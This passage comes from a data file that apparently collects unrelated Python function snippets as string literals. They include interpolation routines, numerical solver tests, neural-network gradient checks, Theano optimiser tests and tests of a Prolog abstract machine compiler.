v4 = np.array([xglobdat[i, 4], xglobdat[i, 5]])\n # print v1, v2, np.dot(v1 - v2, v1 - v2), np.dot(v3 - v4, v3 - v4)\n\n if np.dot(v3 - v4, v3 - v4) > 0.00000001:\n TestResult = 0\n print (\"ERROR\", v1, v2, v3, v4)\n pdb.set_trace()\n v1 = np.array(map.getLocalPosition(xglobdat[i, 4], xglobdat[i, 5]))\n v2 = np.array(xdat[i, 4:6])\n v3 = np.array(map.getGlobalPosition(v1[0], v1[1]))\n v4 = np.array([xglobdat[i, 4], xglobdat[i, 5]])\n print (np.dot(v3 - v4, v3 - v4))\n pdb.set_trace()\n\n if TestResult == 1:\n print (\"Change of coordinates test passed!\")", "def evaluable_view(self, stencil, offset=0):\n return self._evaluable_view(stencil, self.arr, offset)", "def inner_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(c, coordination(c, stencil=stencil) < len(stencil))", "def _evaluate(self, w, x, y, z):\n if _isscalar(x):\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n beta = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[y_pos - 1][z_pos - 1](w, x)\n + (1 - alpha) * beta * self.wxInterpolators[y_pos - 1][z_pos](w, x)\n + alpha * (1 - beta) * self.wxInterpolators[y_pos][z_pos - 1](w, x)\n + alpha * beta * self.wxInterpolators[y_pos][z_pos](w, x)\n )\n else:\n m = len(x)\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.y_n):\n for j in range(1, self.z_n):\n c = np.logical_and(i == y_pos, j == z_pos)\n if np.any(c):\n alpha = (y[c] - self.y_list[i - 1]) / (\n self.y_list[i] - self.y_list[i - 1]\n )\n beta = (z[c] - self.z_list[j - 1]) / (\n self.z_list[j] - self.z_list[j - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[i - 1][j - 1](w[c], x[c])\n + (1 - alpha)\n * beta\n * self.wxInterpolators[i - 1][j](w[c], x[c])\n + alpha\n * (1 - beta)\n * self.wxInterpolators[i][j - 1](w[c], x[c])\n + alpha * beta * self.wxInterpolators[i][j](w[c], x[c])\n )\n return f", "def check_ext(im, i, j):\n neighb = 0\n count = 0\n for a in range(8):\n if (im[i+relpos[a][0], j+relpos[a][1]] and (count == 0)):\n count += 1\n neighb += 1\n else:\n count = 0\n return (neighb < 2)", "def test_bin_op_support():\n check_peval_expression(\"1 + 2\", {}, \"3\", fully_evaluated=True, expected_value=3)\n check_peval_expression(\"2 - 1\", {}, \"1\", fully_evaluated=True, expected_value=1)\n check_peval_expression(\"2 * 3\", {}, \"6\", fully_evaluated=True, expected_value=6)\n check_peval_expression(\"9 / 2\", {}, \"4.5\", fully_evaluated=True, expected_value=4.5)\n check_peval_expression(\"9 // 2\", {}, \"4\", fully_evaluated=True, expected_value=4)\n check_peval_expression(\"9 % 2\", {}, \"1\", fully_evaluated=True, expected_value=1)\n check_peval_expression(\"2 ** 4\", {}, \"16\", fully_evaluated=True, expected_value=16)\n check_peval_expression(\"3 << 2\", {}, \"12\", fully_evaluated=True, expected_value=12)\n check_peval_expression(\"64 >> 3\", {}, \"8\", fully_evaluated=True, expected_value=8)\n check_peval_expression(\"17 | 3\", {}, \"19\", fully_evaluated=True, expected_value=19)\n check_peval_expression(\"17 ^ 3\", {}, \"18\", fully_evaluated=True, expected_value=18)\n check_peval_expression(\"17 & 3\", {}, \"1\", fully_evaluated=True, expected_value=1)", "def test_solvers_bc():\n tol = 3E-12 # Appropriate tolerance for these tests (P2, 20x20 mesh)\n import sympy as sym\n x, y = sym.symbols('x[0], x[1]')\n u = 1 + x**2 + 2*y**2\n f = -sym.diff(u, x, 2) - sym.diff(u, y, 2)\n f = sym.simplify(f)\n u_00 = u.subs(x, 0) # x=0 boundary\n u_01 = u.subs(x, 1) # x=1 boundary\n g = -sym.diff(u, y).subs(y, 1) # x=1 boundary\n r = 1000 # arbitrary function can go here\n s = u\n\n # Turn to C/C++ code for UFL expressions\n f = sym.printing.ccode(f)\n u_00 = sym.printing.ccode(u_00)\n u_01 = sym.printing.ccode(u_01)\n g = sym.printing.ccode(g)\n r = sym.printing.ccode(r)\n s = sym.printing.ccode(s)\n print('Test problem (C/C++):\\nu = %s\\nf = %s' % (u, f))\n print('u_00: %s\\nu_01: %s\\ng = %s\\nr = %s\\ns = %s' %\n (u_00, u_01, g, r, s))\n\n # Turn into FEniCS objects\n u_00 = Expression(u_00)\n u_01 = Expression(u_01)\n f = Expression(f)\n g = Expression(g)\n r = Expression(r)\n s = Expression(s)\n u_exact = Expression(sym.printing.ccode(u))\n\n # Define boundary conditions\n boundary_conditions = {0: {'Dirichlet': u_00},\n 1: {'Dirichlet': u_01},\n 2: {'Robin': (r, s)},\n 3: {'Neumann': g}}\n\n for Nx, Ny in [(3,3), (3,5), (5,3), (20,20)]:\n for degree in 1, 2, 3:\n for linear_solver in ['direct']:\n print('solving on 2(%dx%dx) mesh with P%d elements'\n % (Nx, Ny, degree)),\n print(' %s solver, %s function' %\n (linear_solver, solver_func.__name__))\n kappa = Constant(1)\n u, kappa = solver_bc(\n kappa, f, boundary_conditions, Nx, Ny, degree,\n linear_solver=linear_solver,\n abs_tol=0.1*tol,\n rel_tol=0.1*tol)\n # Make a finite element function of the exact u_D\n V = u.function_space()\n u_e_Function = interpolate(u_exact, V) # exact solution\n # Check that dof arrays are equal\n u_e_array = u_e_Function.vector().array() # dof values\n max_error = (u_e_array - u.vector().array()).max()\n msg = 'max error: %g for 2(%dx%d) mesh, degree=%d,'\\\n ' %s solver, %s' % \\\n (max_error, Nx, Ny, degree, linear_solver,\n solver_func.__name__)\n print(msg)\n assert max_error < tol, msg", "def test_positional_convolution_backward():\n i = 1\n for num_batch in [1, 2, 4]:\n for num_channel in [4, 8, 12]:\n for input_height, input_width in itertools.product([10, 12, 18], [10, 12, 18]):\n for num_filter in [2, 4, 8]:\n for kernel in [(3, 3), (2, 2)]:\n for stride in [(1, 1), (2, 2)]:\n for pad in [(0, 0), (1, 1)]:\n for dilate in [(1, 1), (2, 2)]:\n # for num_group in [1, 2, 4]:\n grad_nodes = ['im_data', 'scale_data', 'weight', 'bias']\n output_height = np.floor(\n (input_height + 2 * pad[0] - dilate[0] * (kernel[0] - 1) - 1) * 1.0 / stride[0]\n ) + 1\n output_width = np.floor(\n (input_width + 2 * pad[1] - dilate[1] * (kernel[1] - 1) - 1) * 1.0 / stride[1]\n ) + 1\n im_data = np.random.rand(num_batch, num_channel, input_height, input_width)\n scale_data = \\\n np.random.rand(num_batch, num_channel, int(output_height), int(output_width))\\\n * 0.8 + 0.1\n\n weight = np.random.normal(0, 0.001, (num_filter, num_channel, kernel[0], kernel[1]))\n bias = np.random.rand(num_filter)\n\n im_data_var = mx.symbol.Variable(name=\"im_data\")\n scale_data_var = mx.symbol.Variable(name=\"scale_data\")\n weight_var = mx.symbol.Variable(name=\"weight\")\n bias_var = mx.symbol.Variable(name=\"bias\")\n op = mx.sym.contrib.PositionalConvolution(name='test_op',\n data=im_data_var,\n scale=scale_data_var,\n weight=weight_var,\n bias=bias_var,\n num_filter=num_filter,\n kernel=kernel, stride=stride, pad=pad,\n dilate=dilate\n )\n rtol, atol = 1e-4, 1e-3\n # absolute(a - b) <= (atol + rtol * absolute(b))\n check_numeric_gradient(op, [im_data, scale_data, weight, bias], rtol=rtol,\n atol=atol, grad_nodes=grad_nodes, ctx=mx.gpu(0))\n print(\"check numeric gradient successfully for the {} times\".format(i))\n i += 1", "def inter_op_dp_inner_loop(\n n_layers, n_devices, submesh_sizes, valid_idxs_costs, max_n_succ_stages\n):\n F = np.full((n_layers + 1, n_layers + 1, n_devices + 1), np.inf, dtype=np.float32)\n F_stage_max = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1), 0.0, dtype=np.float32\n )\n F_argmin = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1, 3), -1, dtype=np.int32\n )\n F[0, n_layers, 0] = 0\n\n for d in range(1, n_devices + 1):\n for (\n l,\n i,\n submesh_shape_idx,\n sharding_config_idx,\n stage_cost,\n ) in valid_idxs_costs:\n l, i, submesh_shape_idx, sharding_config_idx = map(\n int, (l, i, submesh_shape_idx, sharding_config_idx)\n )\n\n n_submesh_devices = submesh_sizes[submesh_shape_idx]\n if n_submesh_devices <= d:\n for s in range(1, n_layers + 1):\n if (\n s - 1\n > max_n_succ_stages[\n l, i, submesh_shape_idx, sharding_config_idx\n ]\n ):\n continue\n\n new_cost = F[s - 1, i + 1, d - n_submesh_devices] + stage_cost\n if new_cost < F[s, l, d]:\n F[s, l, d] = new_cost\n F_argmin[s, l, d] = (\n i + 1,\n submesh_shape_idx,\n sharding_config_idx,\n )\n F_stage_max[s, l, d] = max(\n F_stage_max[s - 1, i + 1, d - n_submesh_devices], stage_cost\n )\n\n return F, F_stage_max, F_argmin", "def test_expression(x, y, z):\n return x * y + y / z", "def evaluateStructure(compiled_expression):", "def test_data_norange(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n lensumrange = random.randint(1, 10)\n\n ex.nreps = nreps\n ex.sumrange = [\"j\", range(lensumrange)]\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.vary[\"Y\"][\"with\"].add(\"j\")\n ex.vary[\"Y\"][\"along\"] = 0\n ex.vary[\"Z\"][\"with\"].update([\"rep\", \"j\"])\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n self.assertIn([\"smalloc\", \"X\", nreps * m * n], cmds)\n idx = random.randint(0, nreps - 1)\n self.assertIn([\"soffset\", \"X\", idx * m * n, \"X_%d\" % idx], cmds)\n\n self.assertIn([\n \"dmalloc\", \"Y\", lensumrange * m * m + (lensumrange - 1) * m\n ], cmds)\n idx = random.randint(0, lensumrange - 1)\n self.assertIn([\"doffset\", \"Y\", idx * m, \"Y_%d\" % idx], cmds)\n\n self.assertIn([\"cmalloc\", \"Z\", nreps * lensumrange * n * n], cmds)\n idxrep = random.randint(0, nreps - 1)\n idxrange = random.randint(0, lensumrange - 1)\n self.assertIn([\"coffset\", \"Z\",\n (idxrep * lensumrange + idxrange) * n * n,\n \"Z_%d_%d\" % (idxrep, idxrange)], cmds)", "def test_ex_2_8(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n instrs = compiler.compile_query_m1(query)\n self.assertEqual(instrs, [\n put_structure(('f', 1), 1),\n set_variable(4),\n put_structure(('a', 0), 7),\n put_structure(('f', 1), 6),\n set_value(7),\n put_structure(('h', 2), 2),\n set_variable(5),\n set_value(6),\n put_value(5, 3),\n call(('p', 3))\n ])\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n instrs = compiler.compile_program_m1(program)\n self.assertEqual(instrs, [\n get_variable(4, 1),\n get_structure(('h', 2), 2),\n unify_value(4),\n unify_variable(5),\n get_structure(('f', 1), 3),\n unify_value(5),\n proceed()\n ])", "def _evaluate(self, w, x, y, z):\n if _isscalar(w):\n x_pos = max(min(np.searchsorted(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos - 1](w)\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos](w)\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos][z_pos - 1](w)\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos][z_pos](w)\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos - 1][z_pos - 1](w)\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos][y_pos - 1][z_pos](w)\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos][z_pos - 1](w)\n + alpha * beta * gamma * self.wInterpolators[x_pos][y_pos][z_pos](w)\n )\n else:\n m = len(x)\n x_pos = np.searchsorted(self.x_list, x)\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.x_n):\n for j in range(1, self.y_n):\n for k in range(1, self.z_n):\n c = np.logical_and(\n np.logical_and(i == x_pos, j == y_pos), k == z_pos\n )\n if np.any(c):\n alpha = (x[c] - self.x_list[i - 1]) / (\n self.x_list[i] - self.x_list[i - 1]\n )\n beta = (y[c] - self.y_list[j - 1]) / (\n self.y_list[j] - self.y_list[j - 1]\n )\n gamma = (z[c] - self.z_list[k - 1]) / (\n self.z_list[k] - self.z_list[k - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i - 1][j - 1][k - 1](w[c])\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[i - 1][j - 1][k](w[c])\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[i - 1][j][k - 1](w[c])\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[i - 1][j][k](w[c])\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i][j - 1][k - 1](w[c])\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[i][j - 1][k](w[c])\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[i][j][k - 1](w[c])\n + alpha\n * beta\n * gamma\n * self.wInterpolators[i][j][k](w[c])\n )\n return f", "def test_positive_slope(self):\n slopes = []\n for i in range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_arithmetic(self):\n denominator_lower_bound = 0.0\n global_step = tf.Variable(0, dtype=tf.int32)\n evaluation_context = basic_expression.BasicExpression.EvaluationContext(\n denominator_lower_bound, global_step)\n\n penalty_values = [-3.6, 1.5, 0.4]\n constraint_values = [-0.2, -0.5, 2.3]\n\n # Create three expressions containing the constants in \"penalty_values\" in\n # their penalty_expressions, and \"constraint_values\" in their\n # constraint_expressions.\n expression_objects = []\n for penalty_value, constraint_value in zip(penalty_values,\n constraint_values):\n expression_object = expression.Expression(\n basic_expression.BasicExpression([],\n tf.constant(\n penalty_value,\n dtype=tf.float32)),\n basic_expression.BasicExpression([], tf.constant(constraint_value)))\n expression_objects.append(expression_object)\n\n # This expression exercises all of the operators.\n expression_object = (\n 0.3 - (expression_objects[0] / 2.3 + 0.7 * expression_objects[1]) -\n (1.2 + expression_objects[2] - 0.1) * 0.6 + 0.8)\n\n actual_penalty_value, _, _ = expression_object.penalty_expression.evaluate(\n evaluation_context)\n actual_constraint_value, _, _ = (\n expression_object.constraint_expression.evaluate(evaluation_context))\n\n # This is the same expression as above, applied directly to the python\n # floats.\n expected_penalty_value = (\n 0.3 - (penalty_values[0] / 2.3 + 0.7 * penalty_values[1]) -\n (1.2 + penalty_values[2] - 0.1) * 0.6 + 0.8)\n expected_constraint_value = (\n 0.3 - (constraint_values[0] / 2.3 + 0.7 * constraint_values[1]) -\n (1.2 + constraint_values[2] - 0.1) * 0.6 + 0.8)\n\n with self.session() as session:\n session.run(\n [tf.global_variables_initializer(),\n tf.local_variables_initializer()])\n\n self.assertNear(\n expected_penalty_value, session.run(actual_penalty_value), err=1e-6)\n self.assertNear(\n expected_constraint_value,\n session.run(actual_constraint_value),\n err=1e-6)", "def test_ex_2_9(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query_m1(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n # Because there is a shared register space, we reuse the query's register allocation to\n # force the program's registers into different slots.\n program_reg_allocation = query_reg_allocation # RegisterAllocation()\n program_instrs = compiler.compile_program_m1(program, program_reg_allocation)\n program_instrs = program_instrs[:-1] # last instruction is proceed; remove it\n\n wam = WAM()\n wam.load(None, query_instrs)\n wam.load(program.get_functor(), program_instrs)\n wam.run()\n\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n\n #print 'X reg:', query_reg_allocation.reg_allocation[X], 'X addr:', aX, 'X: ', wam.get_term_repr(aX)\n #print 'Y reg:', query_reg_allocation.reg_allocation[Y], 'Y addr:', aY, 'Y: ', wam.get_term_repr(aY)\n #print 'Z reg:', program_reg_allocation.reg_allocation[Z], 'Z addr:', aZ, 'Z: ', wam.get_term_repr(aZ)\n #print 'W reg:', program_reg_allocation.reg_allocation[W], 'W addr:', aW, 'W: ', wam.get_term_repr(aW)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_evaluate_index_of_expression(self):\n value = self.evaluate_common(\"indexof('startswith','tart')\")\n self.assertTrue(\n value.type_code == edm.SimpleType.Int32, \"Expected Int32\")\n self.assertTrue(value.value == 1)\n value = self.evaluate_common(\"indexof('startswith','start')\")\n self.assertTrue(value.value == 0)\n value = self.evaluate_common(\"indexof('startswith','t')\")\n self.assertTrue(value.value == 1)\n # not case insensitive\n value = self.evaluate_common(\"indexof('startswith','W')\")\n self.assertTrue(value.value == -1)\n try:\n value = self.evaluate_common(\"indexof('3.14',1)\")\n self.fail(\"integer as parameter\")\n except odata.EvaluationError:\n pass\n try:\n value = self.evaluate_common(\"indexof('3.14')\")\n self.fail(\"1 parameter\")\n except odata.EvaluationError:\n pass", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def test_sipm_indx(mc_sns_sipm_map):\n XL = mc_sns_sipm_map.sipm_map.xl.values\n XR = mc_sns_sipm_map.sipm_map.xr.values\n YU = mc_sns_sipm_map.sipm_map.yu.values\n YD = mc_sns_sipm_map.sipm_map.yd.values\n\n DX = [xr - xl if xl != NN and xr != NN else 2 for xl,xr in zip(XL, XR) ]\n t1 = np.allclose(DX, 2, rtol=1e-03, atol=1e-03)\n return t1", "def test_cspad_xy_at_z():\n ## 'CxiDs1.0:Cspad.0)' or 'DscCsPad'\n basedir = '/reg/g/psdm/detector/alignment/cspad/calib-cxi-camera1-2014-09-24/'\n fname_geometry = basedir + '2016-06-03-geometry-cxi06216-r25-camera1-z175mm.txt'\n fname_data = basedir + '2016-06-03-chun-cxi06216-0025-DscCsPad-max.txt'\n\n geometry = GeometryAccess(fname_geometry, pbits=0o377)\n\n # get pixel coordinate index arrays:\n xyc = xc, yc = 1000, 1000\n #rows, cols = geometry.get_pixel_coord_indexes(xy0_off_pix=xyc)\n #rows, cols = geometry.get_pixel_coord_indexes(do_tilt=True)\n #rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=None, xy0_off_pix=xyc)\n rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=150000)\n\n root, ext = os.path.splitext(fname_data)\n arr = np.load(fname_data) if ext == '.npy' else np.loadtxt(fname_data, dtype=np.float)\n\n #logger.info('arr.shape=', arr.shape\n arr.shape= (32,185,388)\n\n #ave, rms = arr.mean(), arr.std()\n #amp_range = (ave-rms, ave+3*rms)\n amp_range = (0, 1000)\n logger.info('amp_range:' + str(amp_range))\n\n logger.info('shapes rows: %s cols: %s weight: %s' % (str(rows.shape), str(cols.shape), str(arr.shape)))\n img = img_from_pixel_arrays(rows,cols,W=arr)\n\n axim = gg.plotImageLarge(img,amp_range=amp_range)\n gg.move(500,10)\n gg.show()", "def test_sum_pos_5() -> None:\n # Fourth step, 5th square.\n assert nth(sw.sum_walk(), 3) == 5", "def test_ex_2_5(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n program_reg_allocation = RegisterAllocation()\n program_instrs = compiler.compile_program(program, program_reg_allocation)\n\n wam = WAM()\n wam.execute(query_instrs)\n wam.execute(program_instrs)\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_expr(self):\n self.common_test_expr(True)", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n 